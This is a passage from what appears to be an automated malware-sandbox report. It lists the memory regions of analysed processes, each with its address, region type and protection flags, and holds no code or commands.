page read and write
|
||
|
6CC7B7D000
|
stack
|
page read and write
|
||
|
28A83309000
|
heap
|
page read and write
|
||
|
F9427F000
|
stack
|
page read and write
|
||
|
28A814EA000
|
heap
|
page read and write
|
||
|
28A835A5000
|
heap
|
page read and write
|
||
|
1B2BAF25000
|
heap
|
page read and write
|
||
|
7FF7BFDC0000
|
trusted library allocation
|
page read and write
|
||
|
18D5A044000
|
trusted library allocation
|
page read and write
|
||
|
18D58233000
|
heap
|
page read and write
|
||
|
18D724C0000
|
heap
|
page read and write
|
||
|
1B2BADB0000
|
heap
|
page execute and read and write
|
||
|
6CC7FBF000
|
stack
|
page read and write
|
||
|
18D58445000
|
heap
|
page read and write
|
||
|
7FF7BFFA2000
|
trusted library allocation
|
page read and write
|
||
|
702D0000
|
unkown
|
page readonly
|
||
|
7FF7C0030000
|
trusted library allocation
|
page read and write
|
||
|
460C000
|
heap
|
page read and write
|
||
|
28A8349E000
|
heap
|
page read and write
|
||
|
7FF7BFE50000
|
trusted library allocation
|
page read and write
|
||
|
1B2A0C7F000
|
heap
|
page read and write
|
||
|
18D58160000
|
heap
|
page read and write
|
||
|
28A82F0F000
|
heap
|
page read and write
|
||
|
7FF7C00C0000
|
trusted library allocation
|
page read and write
|
||
|
1B2BB230000
|
heap
|
page read and write
|
||
|
18D583C6000
|
heap
|
page read and write
|
||
|
28A836C2000
|
heap
|
page read and write
|
||
|
1B2BAC4A000
|
heap
|
page read and write
|
||
|
7FF7C0060000
|
trusted library allocation
|
page read and write
|
||
|
1B2A2B9D000
|
trusted library allocation
|
page read and write
|
||
|
3AF0000
|
heap
|
page read and write
|
||
|
18D722C0000
|
heap
|
page read and write
|
||
|
28A835B3000
|
heap
|
page read and write
|
||
|
7FF7BFFE0000
|
trusted library allocation
|
page read and write
|
||
|
1B2B2B99000
|
trusted library allocation
|
page read and write
|
||
|
70293000
|
unkown
|
page readonly
|
||
|
7FF7BFF51000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFFC0000
|
trusted library allocation
|
page read and write
|
||
|
6CD50000
|
unkown
|
page readonly
|
||
|
18D5816A000
|
heap
|
page read and write
|
||
|
28A835CF000
|
heap
|
page read and write
|
||
|
6CC7F3D000
|
stack
|
page read and write
|
||
|
54A1000
|
direct allocation
|
page read and write
|
||
|
1B2A0E85000
|
heap
|
page read and write
|
||
|
7FF7BFDAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
28A82F0F000
|
heap
|
page read and write
|
||
|
28A82FB0000
|
heap
|
page read and write
|
||
|
28A83389000
|
heap
|
page read and write
|
||
|
6CC7DBE000
|
stack
|
page read and write
|
||
|
14B0000
|
heap
|
page read and write
|
||
|
28A836C1000
|
heap
|
page read and write
|
||
|
18D580E0000
|
heap
|
page read and write
|
||
|
18D58120000
|
heap
|
page read and write
|
||
|
28A83381000
|
heap
|
page read and write
|
||
|
28A8348D000
|
heap
|
page read and write
|
||
|
18D581A2000
|
heap
|
page read and write
|
||
|
28A82E97000
|
heap
|
page read and write
|
||
|
18D5A02A000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0100000
|
trusted library allocation
|
page read and write
|
||
|
1B2A47C2000
|
trusted library allocation
|
page read and write
|
||
|
4725000
|
heap
|
page read and write
|
||
|
C34D73A000
|
stack
|
page read and write
|
||
|
6CC803E000
|
stack
|
page read and write
|
||
|
F941FE000
|
stack
|
page read and write
|
||
|
C34DEFF000
|
stack
|
page read and write
|
||
|
7FF7C0170000
|
trusted library allocation
|
page read and write
|
||
|
53C1000
|
direct allocation
|
page read and write
|
||
|
18D580B0000
|
heap
|
page read and write
|
||
|
18D724C3000
|
heap
|
page read and write
|
||
|
C34DAFE000
|
stack
|
page read and write
|
||
|
7FF7BFDB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0090000
|
trusted library allocation
|
page read and write
|
||
|
18D5A3CA000
|
trusted library allocation
|
page read and write
|
||
|
4470000
|
heap
|
page read and write
|
||
|
1B2A0BEC000
|
heap
|
page read and write
|
||
|
7FF7C0010000
|
trusted library allocation
|
page read and write
|
||
|
28A82EE3000
|
heap
|
page read and write
|
||
|
7FF7BFE86000
|
trusted library allocation
|
page execute and read and write
|
||
|
1470000
|
heap
|
page read and write
|
||
|
18D59FDD000
|
trusted library allocation
|
page read and write
|
||
|
3613000
|
heap
|
page read and write
|
||
|
28A83588000
|
heap
|
page read and write
|
||
|
1450000
|
heap
|
page read and write
|
||
|
7FF7BFE80000
|
trusted library allocation
|
page execute and read and write
|
||
|
14E4000
|
heap
|
page read and write
|
||
|
134B000
|
stack
|
page read and write
|
||
|
7FF7BFFD0000
|
trusted library allocation
|
page read and write
|
||
|
28A83389000
|
heap
|
page read and write
|
||
|
18D5A2F4000
|
trusted library allocation
|
page read and write
|
||
|
55A000
|
remote allocation
|
page execute and read and write
|
||
|
4C00000
|
direct allocation
|
page read and write
|
||
|
28A82F0F000
|
heap
|
page read and write
|
||
|
28A83345000
|
heap
|
page read and write
|
||
|
4573000
|
heap
|
page read and write
|
||
|
1B2A0DB0000
|
heap
|
page read and write
|
||
|
1B2A26A0000
|
trusted library allocation
|
page read and write
|
||
|
53C4000
|
direct allocation
|
page read and write
|
||
|
28A8337C000
|
heap
|
page read and write
|
||
|
18D721DC000
|
heap
|
page read and write
|
||
|
18D5A0CC000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFF90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B2A2F2C000
|
trusted library allocation
|
page read and write
|
||
|
53AA000
|
direct allocation
|
page read and write
|
||
|
18D583C0000
|
heap
|
page read and write
|
||
|
28A83348000
|
heap
|
page read and write
|
||
|
6CC61000
|
unkown
|
page execute read
|
||
|
7FF7C00B0000
|
trusted library allocation
|
page read and write
|
||
|
28A83389000
|
heap
|
page read and write
|
||
|
28A83389000
|
heap
|
page read and write
|
||
|
7FF7BFFD0000
|
trusted library allocation
|
page read and write
|
||
|
1B2A0BEE000
|
heap
|
page read and write
|
||
|
18D7214A000
|
heap
|
page read and write
|
||
|
5212000
|
direct allocation
|
page read and write
|
||
|
28A835BE000
|
heap
|
page read and write
|
||
|
1B2A0BFC000
|
heap
|
page read and write
|
||
|
18D69FC1000
|
trusted library allocation
|
page read and write
|
||
|
28A834AA000
|
heap
|
page read and write
|
||
|
1B2A2F53000
|
trusted library allocation
|
page read and write
|
||
|
1B2A2660000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0110000
|
trusted library allocation
|
page read and write
|
||
|
5400000
|
direct allocation
|
page read and write
|
||
|
7024F000
|
unkown
|
page readonly
|
||
|
7FF7BFEE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
28A83600000
|
heap
|
page read and write
|
||
|
28A8332D000
|
heap
|
page read and write
|
||
|
53BF000
|
direct allocation
|
page read and write
|
||
|
5397000
|
direct allocation
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
7FF7C0040000
|
trusted library allocation
|
page read and write
|
||
|
28A83385000
|
heap
|
page read and write
|
||
|
6CC7BFF000
|
stack
|
page read and write
|
||
|
18D581A0000
|
heap
|
page read and write
|
||
|
6CC7AFF000
|
stack
|
page read and write
|
||
|
28A82F0D000
|
heap
|
page read and write
|
||
|
1475000
|
heap
|
page read and write
|
||
|
1B2A2D42000
|
trusted library allocation
|
page read and write
|
||
|
1B2A2F13000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFFF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0141000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0070000
|
trusted library allocation
|
page read and write
|
||
|
70292000
|
unkown
|
page read and write
|
||
|
18D721FF000
|
heap
|
page read and write
|
||
|
18D5A0D2000
|
trusted library allocation
|
page read and write
|
||
|
C34DDFF000
|
stack
|
page read and write
|
||
|
1B2A0DF0000
|
heap
|
page read and write
|
||
|
7FF7C00D0000
|
trusted library allocation
|
page read and write
|
||
|
6CD8B000
|
unkown
|
page readonly
|
||
|
28A8157E000
|
heap
|
page read and write
|
||
|
18D72297000
|
heap
|
page execute and read and write
|
||
|
7FF7C00F0000
|
trusted library allocation
|
page read and write
|
||
|
1B2BADB7000
|
heap
|
page execute and read and write
|
||
|
F942FE000
|
stack
|
page read and write
|
||
|
28A8348E000
|
heap
|
page read and write
|
||
|
1B2A426D000
|
trusted library allocation
|
page read and write
|
||
|
6CC60000
|
unkown
|
page readonly
|
||
|
28A835A8000
|
heap
|
page read and write
|
||
|
28A82E90000
|
heap
|
page read and write
|
||
|
28A83371000
|
heap
|
page read and write
|
||
|
702B9000
|
unkown
|
page readonly
|
||
|
F93EFE000
|
stack
|
page read and write
|
||
|
1B2A2662000
|
trusted library allocation
|
page read and write
|
||
|
28A8333D000
|
heap
|
page read and write
|
||
|
7FF7BFF60000
|
trusted library allocation
|
page execute and read and write
|
||
|
6CC8B8E000
|
stack
|
page read and write
|
||
|
1B2A0BB0000
|
heap
|
page read and write
|
||
|
521F000
|
direct allocation
|
page read and write
|
||
|
7FF7C00E0000
|
trusted library allocation
|
page read and write
|
||
|
28A82EA7000
|
heap
|
page read and write
|
||
|
28A835B0000
|
heap
|
page read and write
|
||
|
18D721CC000
|
heap
|
page read and write
|
||
|
F94178000
|
stack
|
page read and write
|
||
|
18D724B0000
|
heap
|
page read and write
|
||
|
28A83389000
|
heap
|
page read and write
|
||
|
1B2A2F1D000
|
trusted library allocation
|
page read and write
|
||
|
28A82E94000
|
heap
|
page read and write
|
||
|
28A83501000
|
heap
|
page read and write
|
||
|
28A82EE3000
|
heap
|
page read and write
|
||
|
18D721F8000
|
heap
|
page read and write
|
||
|
7FF7C0010000
|
trusted library allocation
|
page read and write
|
||
|
70270000
|
unkown
|
page readonly
|
||
|
7FF7BFE76000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0080000
|
trusted library allocation
|
page read and write
|
||
|
18D5A0C9000
|
trusted library allocation
|
page read and write
|
||
|
6CC7EB8000
|
stack
|
page read and write
|
||
|
7FF7C0050000
|
trusted library allocation
|
page read and write
|
||
|
28A83489000
|
heap
|
page read and write
|
||
|
6CC7A7F000
|
stack
|
page read and write
|
||
|
18D72204000
|
heap
|
page read and write
|
||
|
7DF4F42B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
70211000
|
unkown
|
page execute read
|
||
|
3136000
|
heap
|
page read and write
|
||
|
5222000
|
direct allocation
|
page read and write
|
||
|
18D7216B000
|
heap
|
page read and write
|
||
|
7FF7C0060000
|
trusted library allocation
|
page read and write
|
||
|
1B2A4244000
|
trusted library allocation
|
page read and write
|
||
|
28A814F6000
|
heap
|
page read and write
|
There are 482 hidden memdumps, click here to show them.